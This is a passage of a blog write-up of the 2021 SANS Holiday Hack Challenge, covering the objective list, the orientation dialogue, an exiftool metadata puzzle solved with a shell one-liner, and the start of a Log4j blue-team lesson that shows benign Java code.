&lt;li&gt;&lt;a class="reference internal" href="#task-4" id="id44"&gt;Task 4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#task-5" id="id45"&gt;Task 5&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#task-6" id="id46"&gt;Task 6&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#task-7" id="id47"&gt;Task 7&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#task-8" id="id48"&gt;Task 8&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-10" id="id49"&gt;Objective 10:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#noxious-o-d-or-s-cranberry-pi-challenge" id="id50"&gt;Noxious O. D'or's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#now-hiring" id="id51"&gt;Now Hiring!&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-11" id="id52"&gt;Objective 11:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#tinsel-upatree-s-cranberry-pi-challenge" id="id53"&gt;Tinsel Upatree's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#customer-complaint-analysis" id="id54"&gt;Customer Complaint Analysis&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-12" id="id55"&gt;Objective 12:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#ribb-bonbowford-s-cranberry-pi-challenge" id="id56"&gt;Ribb Bonbowford's Cranberry Pi Challenge&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-1" id="id57"&gt;Level 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-2" id="id58"&gt;Level 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-3" id="id59"&gt;Level 3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-4" id="id60"&gt;Level 4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-5" id="id61"&gt;Level 5&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-6" id="id62"&gt;Level 6&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-7" id="id63"&gt;Level 7&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-8" id="id64"&gt;Level 8&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-9" id="id65"&gt;Level 9&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#level-10" id="id66"&gt;Level 10&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#frost-tower-website-checkup" id="id67"&gt;Frost Tower Website Checkup&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#objective-13" id="id68"&gt;Objective 13:&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#grody-goiterson-s-cranberry-pi-challenge" id="id69"&gt;Grody Goiterson's Cranberry Pi Challenge&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#fpga-programming" id="id70"&gt;FPGA Programming&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#conclusion" id="id71"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#answer-to-the-questions" id="id72"&gt;Answer to the questions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id3"&gt;Introduction&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;As always, Santa is organizing KringleCon at his castle. However, a competing
conference seems to be taking place &lt;em&gt;right next&lt;/em&gt; to KringleCon. Indeed, Jack
Frost of all people is organizing FrostFest in his Frost Tower just besides
Santa's castle. I'm sure he's up to no good...&lt;/p&gt;
&lt;p&gt;Let's see what he's planning.&lt;/p&gt;
&lt;p&gt;Here's our list of objectives:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Get your bearings at KringleCon.&lt;/li&gt;
&lt;li&gt;Help Tangle Coalbox find a wayward elf in Santa's courtyard.&lt;/li&gt;
&lt;li&gt;Turn up the heat to defrost the entrance to Frost Tower.&lt;/li&gt;
&lt;li&gt;Test the security of Jack Frost's slot machines. What does the Jack Frost
Tower casino security team threaten to do when your coin total exceeds 1000?
Submit the string in the server &lt;code&gt;data.response&lt;/code&gt; element.&lt;/li&gt;
&lt;li&gt;Assist the elves in reverse engineering the strange USB device.&lt;/li&gt;
&lt;li&gt;Complete the Shellcode Primer in Jack's office. According to the last
challenge, what is the secret to KringleCon success? &amp;quot;All of our speakers
and organizers, providing the gift of ____, free to the community.&amp;quot;&lt;/li&gt;
&lt;li&gt;Investigate the stolen &lt;a class="reference external" href="https://printer.kringlecastle.com/"&gt;Kringle Castle printer&lt;/a&gt;.
Get shell access to read the contents of &lt;code&gt;/var/spool/printer.log&lt;/code&gt;.
What is the name of the last file printed (with a &lt;code&gt;.xlsx&lt;/code&gt; extension)?&lt;/li&gt;
&lt;li&gt;Obtain the secret sleigh research document from a host on the Elf University
domain. What is the first secret ingredient Santa urges each elf and
reindeer to consider for a wonderful holiday season? Start by registering as
a student on the &lt;a class="reference external" href="https://register.elfu.org/"&gt;ElfU Portal&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Help Angel Candysalt solve the Splunk challenge in Santa's great hall. Fitzy
Shortstack is in Santa's lobby, and he knows a few things about Splunk. What
does Santa call you when when you complete the analysis?&lt;/li&gt;
&lt;li&gt;What is the secret access key for the &lt;a class="reference external" href="https://apply.jackfrosttower.com/"&gt;Jack Frost Tower job applications server&lt;/a&gt;?&lt;/li&gt;
&lt;li&gt;A human has accessed the Jack Frost Tower network with a non-compliant
host. &lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/jackfrosttower-network.pcap"&gt;Which three trolls complained about the human&lt;/a&gt;?
Enter the troll names in alphabetical order separated by spaces.&lt;/li&gt;
&lt;li&gt;Investigate &lt;a class="reference external" href="https://staging.jackfrosttower.com/"&gt;Frost Tower's website for security issues&lt;/a&gt;.
&lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/frosttower-web.zip"&gt;This source code will be useful in your analysis&lt;/a&gt;.
In Jack Frost's TODO list, what job position does Jack plan to offer Santa?&lt;/li&gt;
&lt;li&gt;Write your first FPGA program to make a doll sing.&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-1-kringlecon-orientation"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id4"&gt;Objective 1: KringleCon Orientation&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;This objective is just getting your bearings at KringleCon, but as you may
tell from my past blog posts, I'm kind of a regular. But it allows newcomers
to understand how everything works. Anyway, let's talk to Jingle Ringford:&lt;/p&gt;
&lt;img alt="Jingle Ringford. He's an elf with pointy ears. He's wearing a white t-shirt, pink trousers and pink shoes, socks with stripes. He also has a purple christmas hat on his head. He's wearing glasses and grinning." class="align-center" src="/images/sans-christmas-challenge-2021/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome to the North Pole, KringleCon, and the 2021 SANS Holiday Hack
Challenge! I’m Jingle Ringford, one of Santa’s elves.&lt;/p&gt;
&lt;p&gt;Santa asked me to come here and give you a short orientation to this
festive event.&lt;/p&gt;
&lt;p&gt;Before you move forward through the gate, I’ll ask you to accomplish a few
simple tasks.&lt;/p&gt;
&lt;p&gt;First things first, here's your badge! It's that wrapped present in the
middle of your avatar.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We now have a badge around our neck.&lt;/p&gt;
&lt;img alt="Jingle Ringford, same image as before." class="align-center" src="/images/sans-christmas-challenge-2021/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Great - now you're official!&lt;/p&gt;
&lt;p&gt;Click on the badge on your avatar 🎁. That’s where you will see your
Objectives, Hints, and gathered Items for the Holiday Hack Challenge.&lt;/p&gt;
&lt;p&gt;We’ve also got handy links to the KringleCon talks and more there for you!&lt;/p&gt;
&lt;p&gt;Next, click on that USB wifi adapter - just in case you need it later.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We click on the wifi adapter that is lying on the floor:&lt;/p&gt;
&lt;img alt="Jingle Ringford, same image as before." class="align-center" src="/images/sans-christmas-challenge-2021/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fantastic!&lt;/p&gt;
&lt;p&gt;OK, one last thing. Click on the Cranberry Pi Terminal and follow the
on-screen instructions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We click on the Cranberry Pi terminal next to Jingle Ringford:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Enter the answer here&lt;/span&gt;

&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt;

&lt;span class="go"&gt;______&lt;/span&gt;

&lt;span class="go"&gt;Welcome to the first terminal challenge!&lt;/span&gt;

&lt;span class="go"&gt;This one is intentionally simple. All we need you to do is:&lt;/span&gt;

&lt;span class="go"&gt;- Click the upper pane of this terminal&lt;/span&gt;
&lt;span class="go"&gt;- Type answer and press Enter&lt;/span&gt;

&lt;span class="gp"&gt;elf@24e67a8a3d52:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We just do as we're told: we click the upper pane, type &lt;code&gt;answer&lt;/code&gt;, press
Enter, and we're done!&lt;/p&gt;
&lt;img alt="Jingle Ringford, same image as before." class="align-center" src="/images/sans-christmas-challenge-2021/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
Great! Your orientation is now complete! You can enter through the gate
now. Have FUN!!!&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-2"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id5"&gt;Objective 2:&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We arrive at the North Pole! There's Santa's castle, where KringleCon is
taking place, and right next to it we see Jack Frost and his Frost Tower,
where FrostFest is. Let's talk to Santa:&lt;/p&gt;
&lt;img alt="Santa Claus. He's wearing his usual attire: a red suit with a red Christmas hat, and a brown belt with a golden buckle." class="align-center" src="/images/sans-christmas-challenge-2021/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Ho ho ho! I'm Santa Claus!&lt;/p&gt;
&lt;p&gt;Welcome to the North Pole and KringleCon IV: Calling Birds!&lt;/p&gt;
&lt;p&gt;I’d like to introduce you to the four birds here, each of whom is calling.&lt;/p&gt;
&lt;p&gt;We're so glad to have you here to celebrate the holidays - and practice some important skills.&lt;/p&gt;
&lt;p&gt;What's that? You've heard of another conference up at the North Pole?&lt;/p&gt;
&lt;p&gt;Well, I'm afraid you'll have to ask Jack Frost about that.&lt;/p&gt;
&lt;p&gt;To be honest, I'm not quite sure what his intentions are, but I am keeping an eye out...&lt;/p&gt;
&lt;p&gt;Anyway, enjoy your time with the SANS Holiday Hack Challenge and KringleCon!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Right next to him are four calling birds:&lt;/p&gt;
&lt;img alt="Yeller. They're a black bird, shouting." src="/images/sans-christmas-challenge-2021/yeller.png" /&gt;
&lt;img alt="Seller. They're a grey bird, wearing a red tie, making a phone call." src="/images/sans-christmas-challenge-2021/seller.png" /&gt;
&lt;img alt="Quacker. They're a white bird with a bird call." src="/images/sans-christmas-challenge-2021/quacker.png" /&gt;
&lt;img alt="Dealer. They're a brown bird, with a green poker visor, holding cards in their hands (or wings)." src="/images/sans-christmas-challenge-2021/dealer.png" /&gt;
&lt;p&gt;&lt;em&gt;Yeller, Seller, Quacker, and Dealer say&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Yeller: HEEEEEEY YOU!!!&lt;/p&gt;
&lt;p&gt;Seller: Your car's warranty is about to expire!&lt;/p&gt;
&lt;p&gt;Quacker: QUACK!&lt;/p&gt;
&lt;p&gt;Dealer: Ante up!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's see what Jack Frost, aka Jerky McJerkface, has to say:&lt;/p&gt;
&lt;img alt="Jack Frost. He's wearing a red suit with white stripes, green shoes and a green shirt. He has pointy ears and blue spiky hair. His arms are crossed and he's smirking like a jerk." class="align-center" src="/images/sans-christmas-challenge-2021/jack_smirk.png" /&gt;
&lt;p&gt;&lt;em&gt;Jack Frost says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome to the North Pole - the Frostiest Place on Earth™!&lt;/p&gt;
&lt;p&gt;Last year, Santa somehow foiled my plot.&lt;/p&gt;
&lt;p&gt;So this year, I've decided to beat Santa at his own game – I’m gonna take over the Holiday Season from the old man and dominate it myself.&lt;/p&gt;
&lt;p&gt;I've built Frost Tower, the epicenter of Frostiness at the North Pole. Believe me, it's the BIGGEST North Pole tower the world has EVER seen! So much better than that lame castle next door.&lt;/p&gt;
&lt;p&gt;And, quite frankly, our FrostFest conference is going to be the GREATEST con in the history of cons.&lt;/p&gt;
&lt;p&gt;As for FrostFest, we honor all badges for entry, including those from the lame conference next door.&lt;/p&gt;
&lt;p&gt;Oh, and make sure you visit the gift shop and buy some SWAG on your way out.&lt;/p&gt;
&lt;p&gt;Everybody says it's the best SWAG you'll ever find! People love our swag!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="piney-sappington-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id6"&gt;Piney Sappington's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;HELP! That wily Jack Frost modified one of our naughty/nice records, and right&lt;/span&gt;
&lt;span class="go"&gt;before Christmas! Can you help us figure out which one? We&amp;#39;ve installed exiftool&lt;/span&gt;
&lt;span class="go"&gt;for your convenience!&lt;/span&gt;

&lt;span class="go"&gt;Filename (including .docx extension) &amp;gt;&lt;/span&gt;

&lt;span class="gp"&gt;elf@ba19bc21b7b1:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, we're told to find which file was modified by Jack Frost. And
&lt;code&gt;exiftool&lt;/code&gt; is installed, this will be helpful.&lt;/p&gt;
&lt;p&gt;Let's take a look at a file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ba19bc21b7b1:~$&lt;/span&gt; ls
&lt;span class="go"&gt;2021-12-01.docx  2021-12-06.docx  2021-12-11.docx  2021-12-16.docx  2021-12-21.docx&lt;/span&gt;
&lt;span class="go"&gt;2021-12-02.docx  2021-12-07.docx  2021-12-12.docx  2021-12-17.docx  2021-12-22.docx&lt;/span&gt;
&lt;span class="go"&gt;2021-12-03.docx  2021-12-08.docx  2021-12-13.docx  2021-12-18.docx  2021-12-23.docx&lt;/span&gt;
&lt;span class="go"&gt;2021-12-04.docx  2021-12-09.docx  2021-12-14.docx  2021-12-19.docx  2021-12-24.docx&lt;/span&gt;
&lt;span class="go"&gt;2021-12-05.docx  2021-12-10.docx  2021-12-15.docx  2021-12-20.docx  2021-12-25.docx&lt;/span&gt;
&lt;span class="gp"&gt;elf@ba19bc21b7b1:~$&lt;/span&gt; exiftool &lt;span class="m"&gt;2021&lt;/span&gt;-12-01.docx
&lt;span class="go"&gt;ExifTool Version Number         : 12.16&lt;/span&gt;
&lt;span class="go"&gt;File Name                       : 2021-12-01.docx&lt;/span&gt;
&lt;span class="go"&gt;Directory                       : .&lt;/span&gt;
&lt;span class="go"&gt;File Size                       : 13 KiB&lt;/span&gt;
&lt;span class="go"&gt;File Modification Date/Time     : 2021:11:23 15:48:01+00:00&lt;/span&gt;
&lt;span class="go"&gt;File Access Date/Time           : 2021:11:23 15:48:01+00:00&lt;/span&gt;
&lt;span class="go"&gt;File Inode Change Date/Time     : 2021:12:08 04:08:22+00:00&lt;/span&gt;
&lt;span class="go"&gt;File Permissions                : rw-r--r--&lt;/span&gt;
&lt;span class="go"&gt;File Type                       : DOCX&lt;/span&gt;
&lt;span class="go"&gt;File Type Extension             : docx&lt;/span&gt;
&lt;span class="go"&gt;MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingm&lt;/span&gt;
&lt;span class="go"&gt;l.document&lt;/span&gt;
&lt;span class="go"&gt;Zip Required Version            : 20&lt;/span&gt;
&lt;span class="go"&gt;Zip Bit Flag                    : 0&lt;/span&gt;
&lt;span class="go"&gt;Zip Compression                 : Deflated&lt;/span&gt;
&lt;span class="go"&gt;Zip Modify Date                 : 1980:01:01 00:00:00&lt;/span&gt;
&lt;span class="go"&gt;Zip CRC                         : 0x6cd2a4df&lt;/span&gt;
&lt;span class="go"&gt;Zip Compressed Size             : 340&lt;/span&gt;
&lt;span class="go"&gt;Zip Uncompressed Size           : 1312&lt;/span&gt;
&lt;span class="go"&gt;Zip File Name                   : [Content_Types].xml&lt;/span&gt;
&lt;span class="go"&gt;Template                        : Normal.dotm&lt;/span&gt;
&lt;span class="go"&gt;Total Edit Time                 : 31 minutes&lt;/span&gt;
&lt;span class="go"&gt;Pages                           : 1&lt;/span&gt;
&lt;span class="go"&gt;Words                           : 5&lt;/span&gt;
&lt;span class="go"&gt;Characters                      : 31&lt;/span&gt;
&lt;span class="go"&gt;Application                     : Microsoft Office Word&lt;/span&gt;
&lt;span class="go"&gt;Doc Security                    : None&lt;/span&gt;
&lt;span class="go"&gt;Lines                           : 1&lt;/span&gt;
&lt;span class="go"&gt;Paragraphs                      : 1&lt;/span&gt;
&lt;span class="go"&gt;Scale Crop                      : No&lt;/span&gt;
&lt;span class="go"&gt;Company                         :&lt;/span&gt;
&lt;span class="go"&gt;Links Up To Date                : No&lt;/span&gt;
&lt;span class="go"&gt;Characters With Spaces          : 35&lt;/span&gt;
&lt;span class="go"&gt;Shared Doc                      : No&lt;/span&gt;
&lt;span class="go"&gt;Hyperlinks Changed              : No&lt;/span&gt;
&lt;span class="go"&gt;App Version                     : 16.0000&lt;/span&gt;
&lt;span class="go"&gt;Title                           :&lt;/span&gt;
&lt;span class="go"&gt;Subject                         :&lt;/span&gt;
&lt;span class="go"&gt;Creator                         : Santa Claus&lt;/span&gt;
&lt;span class="go"&gt;Keywords                        :&lt;/span&gt;
&lt;span class="go"&gt;Description                     :&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Last Modified By                : Santa Claus&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;Revision Number                 : 3&lt;/span&gt;
&lt;span class="go"&gt;Create Date                     : 2021:12:01 00:00:00Z&lt;/span&gt;
&lt;span class="go"&gt;Modify Date                     : 2021:12:01 00:00:00Z&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Okay, the name of the last person who modified a file is in the output of
&lt;code&gt;exiftool&lt;/code&gt;. Let's whip up a dirty one-liner to find which file was
modified by Jack Frost:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ba19bc21b7b1:~$&lt;/span&gt; ls -1 *.docx &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="nb"&gt;read&lt;/span&gt; f&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; exiftool &lt;span class="nv"&gt;$f&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; grep -q -iE &lt;span class="s1"&gt;&amp;#39;Last Modified By\s+ : .*Frost&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;
&lt;span class="go"&gt;2021-12-21.docx&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's break it down:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;code&gt;ls -1 *.docx&lt;/code&gt;: this creates a list of every &lt;code&gt;.docx&lt;/code&gt; file in the
folder, and outputs one file by line.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;while read f; do ...; done&lt;/code&gt;: this loops over every file, storing the
name in a variable called &lt;code&gt;f&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;exiftool $f&lt;/code&gt;: well this just calls &lt;code&gt;exiftool&lt;/code&gt; on our file.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;grep -q -iE 'Last Modified By\s+ : .*Frost' &amp;amp;&amp;amp; echo $f&lt;/code&gt;: this is the
clever part. The &lt;code&gt;grep -q -iE 'Last Modified By\s+ : .*Frost'&lt;/code&gt; part
will search Jack's name in the &lt;code&gt;Last Modified By&lt;/code&gt; field of the output
of &lt;code&gt;exiftool&lt;/code&gt;. It does so in a case-insensitive way, and it does so
&lt;em&gt;quietly&lt;/em&gt;. This means that &lt;code&gt;grep&lt;/code&gt; will not output anything, we just
rely on the return code to see if we have a match or not. That's what the
&lt;code&gt;&amp;amp;&amp;amp; echo $f&lt;/code&gt; does. It will print out the name of the file only if we
had a match with &lt;code&gt;grep&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let's see if we have the right solution:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Filename (including .docx extension) &amp;gt; 2021-12-21.docx&lt;/span&gt;
&lt;span class="go"&gt;Your answer: 2021-12-21.docx&lt;/span&gt;

&lt;span class="go"&gt;Checking........&lt;/span&gt;
&lt;span class="go"&gt;Wow, that&amp;#39;s right! We couldn&amp;#39;t have done it without your help! Congratulations&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="bonus-log4jack"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id7"&gt;Bonus! Log4Jack&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Aaaah, Log4Shell. This vulnerability made a lot of noise just before the
holidays, and the SANS team quickly created two challenges around it for our
pleasure.&lt;/p&gt;
&lt;div class="section" id="bow-ninecandle-s-blue-team-cranberry-pi-challenge"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id8"&gt;Bow Ninecandle's blue team Cranberry Pi Challenge&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;This Cranberry Pi challenge will teach us what the vulnerabilities affecting
Log4j are, how to exploit them, how to patch them, how to scan for them in
source code, and how to search for exploit attempts in log files.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🎄🎄🎄 Prof. Petabyte here. In this lesson we'll look at the details around the recent Log4j&lt;/p&gt;
&lt;p&gt;🎄🎄🎄 vulnerabilities using sample Java programs. We'll also look at tools for scanning&lt;/p&gt;
&lt;p&gt;🎄🎄🎄 for vulnerable source code and identifying attacks using web server logs.&lt;/p&gt;
&lt;p&gt;🎄🎄🎄 If you get stuck, run 'hint' for assitance.&lt;/p&gt;
&lt;p&gt;In this lesson we'll look at Java source code to better understand the
Log4j vulnerabilities described in CVE-2021-44228. You don't need to be a
programmer to benefit from this lesson!&lt;/p&gt;
&lt;p&gt;I have prepared several files for you to use in this lesson. Run the 'ls'
command to see the files for this lesson.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; ls
&lt;span class="go"&gt;log4j2-scan  logshell-search.sh  patched  vulnerable&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;First we'll look at the some Java source, including an example of a
vulnerable Java program using the Log4j library.&lt;/p&gt;
&lt;p&gt;Change to the vulnerable directory with the command 'cd vulnerable'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; vulnerable/
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
List the files in this directory. Run the 'ls' command.&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; ls
&lt;span class="go"&gt;DisplayFilev1.java  DisplayFilev2.java  log4j-api-2.14.1.jar  log4j-core-2.14.1.jar  startserver.sh  testfile.txt&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Here we have Java source code (with the .java file name extension), and a
vulnerable version of the Log4j library.&lt;/p&gt;
&lt;p&gt;Display the contents of the DisplayFilev1.java source code with the 'cat'
command.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; cat DisplayFilev1.java
&lt;span class="go"&gt;import java.io.*;&lt;/span&gt;

&lt;span class="go"&gt;public class DisplayFilev1 {&lt;/span&gt;
&lt;span class="go"&gt;    public static void main(String[] args) throws Exception {&lt;/span&gt;

&lt;span class="go"&gt;        File file = new File(args[0]);&lt;/span&gt;
&lt;span class="go"&gt;        BufferedReader br = new BufferedReader(new FileReader(file));&lt;/span&gt;

&lt;span class="go"&gt;        String st;&lt;/span&gt;
&lt;span class="go"&gt;        while ((st = br.readLine()) != null) {&lt;/span&gt;
&lt;span class="go"&gt;            System.out.println(st);&lt;/span&gt;
&lt;span class="go"&gt;        }&lt;/span&gt;
&lt;span class="go"&gt;    }&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This Java program has one job: it reads a file specified as a command-line
argument, and displays the contents on the screen. We'll use it as an
example of error handling in Java.&lt;/p&gt;
&lt;p&gt;Let's compile this Java source so we can run it. Run the command 'javac
DisplayFilev1.java'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; javac DisplayFilev1.java
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Nice work! You just compiled the Java program. Next, run the program and
display the contents of the testfile.txt file.&lt;/p&gt;
&lt;p&gt;Run 'java DisplayFilev1 testfile.txt'&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; java DisplayFilev1 testfile.txt
&lt;span class="go"&gt;Hello from Prof. Petabyte!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;.&lt;/p&gt;
&lt;blockquote&gt;
This program did its job: it displayed the testfile.txt contents. But it
also has some problems. Re-run the last command, this time trying to read
testfile2.txt&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elfu@af9129760395:~/vulnerable$&lt;/span&gt; java DisplayFilev1 testfile2.txt
&lt;span class="go"&gt;Exception in thread &amp;quot;main&amp;quot; java.io.FileNotFoundException: testfile2.txt (No such file or directory)&lt;/span&gt;
&lt;span class="go"&gt;        at java.io.FileInputStream.open0(Native Method)&lt;/span&gt;
&lt;span class="go"&gt;        at java.io.FileInputStream.open(FileInputStream.java:195)&lt;/span&gt;
